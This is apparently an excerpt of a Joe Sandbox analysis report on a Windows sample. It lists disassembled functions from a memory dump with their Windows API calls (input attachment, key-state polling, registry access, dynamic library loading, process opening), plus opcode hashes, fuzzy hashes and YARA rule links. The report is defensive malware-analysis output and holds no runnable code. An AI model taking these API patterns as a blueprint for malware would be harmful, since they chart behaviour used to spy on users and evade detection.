                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: bb05a3440dc705920d32e428f9e03aaf7855fb6aefca29cdc6ab6ae15822dd9b
                    • Instruction ID: 91bbc674e575fa227485921db86495f2fc96cc17322a38bc028ebf4cb8d4bdfa
                    • Opcode Fuzzy Hash: bb05a3440dc705920d32e428f9e03aaf7855fb6aefca29cdc6ab6ae15822dd9b
                    • Instruction Fuzzy Hash: B8219831A00109AFCB10DF54CD85EAE7BB8EF49714B008069F909EB351DB71EE41DB21
                    Function 00CCA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                      • Part of subcall function 00CCA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCA399
                      • Part of subcall function 00CCA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCA3AC
                      • Part of subcall function 00CCA37C: GetCurrentThreadId.KERNEL32 ref: 00CCA3B3
                      • Part of subcall function 00CCA37C: AttachThreadInput.USER32(00000000), ref: 00CCA3BA
                    • GetFocus.USER32 ref: 00CCA554
                      • Part of subcall function 00CCA3C5: GetParent.USER32(?), ref: 00CCA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00CCA59D
                    • EnumChildWindows.USER32(?,00CCA615), ref: 00CCA5C5
                    • __swprintf.LIBCMT ref: 00CCA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 9566f3f0e2837bb5ce99b134e149bce66604c25f3f840261ef2cce9d23b99a99
                    • Instruction ID: 38e63a275d4648b6f322e565288d35395fb31e4348406c1e3388a7cc402fa4cb
                    • Opcode Fuzzy Hash: 9566f3f0e2837bb5ce99b134e149bce66604c25f3f840261ef2cce9d23b99a99
                    • Instruction Fuzzy Hash: 8311727160020DBBDF117F65DC89FEE7778EF48704F044079F918AA152CA7099469B76
                    Function 00CD2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00CD2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: 1b5a6aae2aa495116890cc130fc9dd23896916b8db6292925d7168133ac346ff
                    • Instruction ID: 8c616056d1d25d6b1d1e92365bf5824650899162d81e20540b580db1ba381f29
                    • Opcode Fuzzy Hash: 1b5a6aae2aa495116890cc130fc9dd23896916b8db6292925d7168133ac346ff
                    • Instruction Fuzzy Hash: 59116131900119CFCF00EFA8D9415FEB7B4FF25304B148469D855A7351DB326A16EB51
                    Function 00CE8F5B Relevance: 7.9, APIs: 5, Instructions: 438COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CFF910), ref: 00CE903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CFF910), ref: 00CE9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CE91EB
                    • SysFreeString.OLEAUT32(?), ref: 00CE9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: ab786bff64a0f74f1aeb2a034fe50b034d61386bd51c7c3da21b075d06838841
                    • Instruction ID: 6266e12cc5899986551cbc6e621cfde96f3c102f2121839615c1e936706694e0
                    • Opcode Fuzzy Hash: ab786bff64a0f74f1aeb2a034fe50b034d61386bd51c7c3da21b075d06838841
                    • Instruction Fuzzy Hash: 22F14D71A00209EFDF14DF95C888EAEB7B9FF49314F108059F516AB2A1DB71AE46CB50
                    Function 00CEEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CEEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CEEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CEF07E
                    • CloseHandle.KERNEL32(?), ref: 00CEF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 676371735aeb92b47929d747b7582762dcaca21844969e75b21fb7d44d6a28bc
                    • Instruction ID: 7052148ddccaf0c57fb3549b069f1cfecafbb7c11d19d628f7d2f5af807884e1
                    • Opcode Fuzzy Hash: 676371735aeb92b47929d747b7582762dcaca21844969e75b21fb7d44d6a28bc
                    • Instruction Fuzzy Hash: 02815F716043019FD720DF29C886F2AB7E5EF88720F14C82DF599DB292DB70AD459B52
                    Function 00CF02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF03C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CF040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00CF043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF0447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: a7fbecaeb5506606cb7c6d5667dfbba7acdb5afc1ad7913c4d2d48f02b367a43
                    • Instruction ID: 13ebce14edf1a49c11b3ffa6dfd90405e0f346dfcd33dabf888bc825776e0410
                    • Opcode Fuzzy Hash: a7fbecaeb5506606cb7c6d5667dfbba7acdb5afc1ad7913c4d2d48f02b367a43
                    • Instruction Fuzzy Hash: D0512B31208204AFD744EB54C881F7EB7E8FF84714F54892DF69A972A2DB30E905EB52
                    Function 00CEDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CEDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CEDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CEDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CEDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CEDD35
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CD7B20,?,?,00000000), ref: 00C75B8C
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CD7B20,?,?,00000000,?,?), ref: 00C75BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: 8fd72380e7893ed2bda28b797b39b6d8ffb0608a924c527a36cdc7ad2424bfc0
                    • Instruction ID: dc6682c15601331450075ff32a06d14028958158061e9084827229d85262babe
                    • Opcode Fuzzy Hash: 8fd72380e7893ed2bda28b797b39b6d8ffb0608a924c527a36cdc7ad2424bfc0
                    • Instruction Fuzzy Hash: 43512775A00245DFDB01EF69C8849ADB7F4FF48320B14C069E81AAB361DB70AE45DF91
                    Function 00CDE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CDE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CDE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CDE8F2
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CDE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CDE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: a68aae5eb2a894b5db87f0488ddb08d40c06af85065169d45b68b68c378d3b56
                    • Instruction ID: c248976f9582e1ec72ffb4eebf507111cabf5862fc22c44a22ceb624e44f343a
                    • Opcode Fuzzy Hash: a68aae5eb2a894b5db87f0488ddb08d40c06af85065169d45b68b68c378d3b56
                    • Instruction Fuzzy Hash: B5511A35A00205DFDF11EF64C981AAEBBF5EF48310B14C0A9E949AB362CB31ED11EB51
                    Function 00CFA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6055b5f0a6c9c7fbbb1350c3bb2aa90d0d31e49a8d5609e2c611e206bd04bec4
                    • Instruction ID: af6a33bdfd142fab460b2ed1cd9b342b34bc935ee50142d7a18a02d29d36c80f
                    • Opcode Fuzzy Hash: 6055b5f0a6c9c7fbbb1350c3bb2aa90d0d31e49a8d5609e2c611e206bd04bec4
                    • Instruction Fuzzy Hash: 1241BEB5900208AFC760DB28CC48BB9FBA4EB09310F154165EA69A72E1D770EE45DA63
                    Function 00C72344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00C72357
                    • ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                    • GetAsyncKeyState.USER32(00000001), ref: 00C72399
                    • GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 83e340d6523d07b6f04c90863a919984be4aaf5469d5b25167bb3a76625472ef
                    • Instruction ID: 85939c1ff28b7f7fe67b5be536269ca8eefa7773ce8f273983f2366038021bc4
                    • Opcode Fuzzy Hash: 83e340d6523d07b6f04c90863a919984be4aaf5469d5b25167bb3a76625472ef
                    • Instruction Fuzzy Hash: 6641833550411AFBDF159F69C884BEDBB78FF05324F10831AF938962A0C7345A54EB91
                    Function 00CC6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00CC69A9
                    • TranslateMessage.USER32(?), ref: 00CC69D2
                    • DispatchMessageW.USER32(?), ref: 00CC69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: 7675846c2a7bd45ba8f30a641d926d519295ba5582d01ff6b5b3843becd8bfa0
                    • Instruction ID: 67cd1905cb4b78a7695bb53659f48dcfb07cde928cdcb9b30c64650216b8e7a2
                    • Opcode Fuzzy Hash: 7675846c2a7bd45ba8f30a641d926d519295ba5582d01ff6b5b3843becd8bfa0
                    • Instruction Fuzzy Hash: 1731D271904246ABDB20CF75CD44FBA7BACEB01304F14816DE431D36A1E734D98AE7A1
                    Function 00CC8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00CC8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00CC8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CC8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00CC8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CC8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 4d75f60b254818b6a68fc2819f454f9270d87e16fc3582d648a6415e04c39a18
                    • Instruction ID: bac226ee7ce0c1b280dec4cfa9fc75f80b86e07bbf6841ff5f44df990f84486f
                    • Opcode Fuzzy Hash: 4d75f60b254818b6a68fc2819f454f9270d87e16fc3582d648a6415e04c39a18
                    • Instruction Fuzzy Hash: 5E31BF71500219EBDB14CFA8D948BAF7BB6EF44315F10422DF925E62D0CBB09A18DB91
                    Function 00CCB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00CCB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CCB742
                    • _wcsstr.LIBCMT ref: 00CCB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: cd67218fc0ba2e83d22dce9823ad19c3ad27de2697cbb9a58d2b21ac46e2830e
                    • Instruction ID: 7d13a2d8522260fb6a41927b6bad2261aea9d6ec8ee55d84b986190899dff668
                    • Opcode Fuzzy Hash: cd67218fc0ba2e83d22dce9823ad19c3ad27de2697cbb9a58d2b21ac46e2830e
                    • Instruction Fuzzy Hash: 4621D032204204BAEB255BB9DC4AF7B7BA8DF89760F00402DFC05CA1A1EF61CD4197A1
                    Function 00CFB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFB44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CFB471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CFB489
                    • GetSystemMetrics.USER32(00000004), ref: 00CFB4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CE1184,00000000), ref: 00CFB4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: aa436dedf035ef0838cae7f7a10ea4a1bb4ceecec26d7215aee3cf01e0d0de08
                    • Instruction ID: b8fa10c5787955a8fd5be0f4eb620646a1bcc6f8323c74fc5c0b8da6668fc926
                    • Opcode Fuzzy Hash: aa436dedf035ef0838cae7f7a10ea4a1bb4ceecec26d7215aee3cf01e0d0de08
                    • Instruction Fuzzy Hash: CB218D71910219AFCB508F39CD04B7A3BA4EF09724F158728FA36C62E1E7309D11DB91
                    Function 00CC97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC9802
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CC9834
                    • __itow.LIBCMT ref: 00CC984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CC9874
                    • __itow.LIBCMT ref: 00CC9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
